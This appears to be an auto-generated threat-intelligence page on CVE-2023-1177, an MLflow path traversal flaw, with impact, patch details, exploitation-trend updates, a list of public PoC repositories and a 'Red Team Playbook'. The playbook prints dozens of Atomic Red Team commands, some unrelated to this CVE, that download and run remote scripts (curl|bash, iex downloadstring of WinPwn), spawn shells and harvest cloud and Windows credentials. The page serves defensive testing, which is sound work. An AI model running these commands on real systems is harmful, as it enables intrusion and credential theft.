CVE-2023-1177
Overview
This vulnerability is a path traversal flaw in the mlflow/mlflow project affecting versions prior to 2.2.1. The root cause lies in insufficient validation of file path inputs, allowing an attacker to manipulate directory traversal sequences such as '\..\filename'. The affected component is the file handling mechanism within the repository, which improperly sanitizes user-supplied path parameters, enabling unauthorized access to filesystem locations outside the intended directory scope.
Vulnerability Description
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.
Impact
An attacker with network access and no authentication required (AV:N/AC:L/PR:N/UI:N) can exploit this path traversal to read arbitrary files on the server hosting mlflow. This can lead to unauthorized disclosure of sensitive configuration files or credentials, potentially enabling further compromise. The vulnerability's high confidentiality impact (C:H) combined with limited integrity impact (I:L) reflects the ability to access sensitive data without modifying it. The attacker does not need user interaction and can execute the exploit remotely, increasing the severity of the threat.
Solution
Users of mlflow/mlflow should upgrade to version 2.2.1 or later, where the path traversal vulnerability has been addressed as per the GitHub pull request 7891 (commit 7162a50c654792c21f3e4a160eb1a0e6a34f6e6e). The Huntr advisory (https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28) provides additional context on the fix. No alternative workarounds are documented; applying the official patch is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is a path traversal issue found in the MLflow repository, which allows an attacker to manipulate file paths in a way that can lead to unauthorized access to files on the server. This type of vulnerability occurs when an application does not properly sanitize user input, allowing an attacker to traverse directories and access files that are outside the intended directory structure. Specifically, by using sequences like '\..\filename', an attacker can potentially read sensitive files stored on the server, which could include configuration files, secrets, or other critical data.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request that includes the path traversal sequence, targeting endpoints that handle file uploads or file retrieval. For instance, if the application allows users to specify file names or paths without adequate validation, an attacker could exploit this to access sensitive information. Additionally, if the application is deployed in a cloud environment or on a shared server, the risk is amplified, as the attacker may gain access to files belonging to other users or applications, leading to a broader compromise.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on MLflow for managing machine learning workflows. If an attacker successfully exploits this vulnerability, they could gain access to sensitive data, including API keys, database credentials, or proprietary algorithms. This could lead to data breaches, loss of intellectual property, and potential regulatory penalties, depending on the nature of the data accessed. Furthermore, the high CVSS score of 9.8 indicates that the vulnerability poses a critical risk, emphasizing the urgency for organizations to address it promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should ensure that all user inputs are properly validated and sanitized, particularly when dealing with file paths. Employing whitelisting techniques to restrict acceptable input can significantly reduce the risk of path traversal attacks. Additionally, organizations should conduct regular security assessments and code reviews to identify and remediate vulnerabilities in their applications. Utilizing web application firewalls (WAFs) can also help in detecting and blocking malicious requests that attempt to exploit this vulnerability.
In conclusion, the path traversal vulnerability in the MLflow repository highlights the critical importance of secure coding practices and robust input validation. Organizations must prioritize the identification and remediation of such vulnerabilities to protect their sensitive data and maintain the integrity of their applications. By adopting proactive security measures, including thorough testing and monitoring, businesses can mitigate the risks associated with this and similar vulnerabilities, ultimately safeguarding their assets and maintaining trust with their users.
CSURFACE threat intelligence has detected a moderate increase in exploitation attempts targeting the MLflow path traversal vulnerability, accompanied by a slight decline in the EPSS score. This divergence suggests that while adversaries are maintaining or slightly intensifying their probing activities, the overall likelihood of widespread exploitation is currently diminishing. The emergence of multiple new proof-of-concept exploits on public repositories continues to lower the barrier for threat actors to weaponize this vulnerability, sustaining its attractiveness for opportunistic attackers. For defenders, this dynamic underscores the importance of vigilance despite a marginally reduced probabilistic risk, as the availability of diverse exploit code can facilitate rapid shifts in attack patterns. Consequently, the threat level remains critical due to the vulnerability’s high severity and active exploitation attempts, even as some risk indicators show a downward trend.
Update 2 — July 06, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-1177, reflecting a modest rise in adversary interest. While the overall frequency of detections remains relatively stable, this subtle uptick suggests that threat actors continue to probe for vulnerable MLflow instances, likely leveraging the growing availability of diverse proof-of-concept exploits on public platforms. The persistence of multiple publicly accessible exploit repositories maintains a low barrier to entry for less sophisticated attackers, potentially broadening the pool of adversaries capable of weaponizing this vulnerability. Consequently, despite the absence of a rapid surge in activity, the threat environment remains elevated due to the vulnerability’s critical severity and ongoing exploitation efforts. This nuanced increase underscores the importance of sustained monitoring, as even marginal growth in exploitation attempts can presage more aggressive or widespread campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Lfprojects | Mlflow | All |
cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
alphandbelt1/CVE-2023-1177-MLFlow
CVE for 2023
|
alphandbelt1 | 0 | 0 | 2024-08-08 | View |
|
hh-hunter/ml-CVE-2023-1177
|
hh-hunter | 0 | 0 | 2023-04-13 | View |
|
SpycioKon/CVE-2023-1177-rebuild
Learn more things, not suck all things
|
SpycioKon | 0 | 0 | 2023-11-20 | View |
|
paultheal1en/CVE-2023-1177-PoC-reproduce
PoC of CVE-2023-1177 vulnerability in MLflow (Reproduce)
|
paultheal1en | 0 | 0 | 2025-04-12 | View |
|
saimahmed/MLflow-Vuln
MLflow LFI/RFI Vulnerability -CVE-2023-1177 - Reproduced
|
saimahmed | 0 | 0 | 2024-08-21 | View |
|
charlesgargasson/CVE-2023-1177
MLFlow Path Traversal
|
charlesgargasson | 0 | 0 | 2024-09-19 | View |
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-1177 |
| huntr.dev |
GitHub CVE
|
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28 |
| github.com |
GitHub CVE
|
https://github.com/mlflow/mlflow/pull/7891/commits/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e |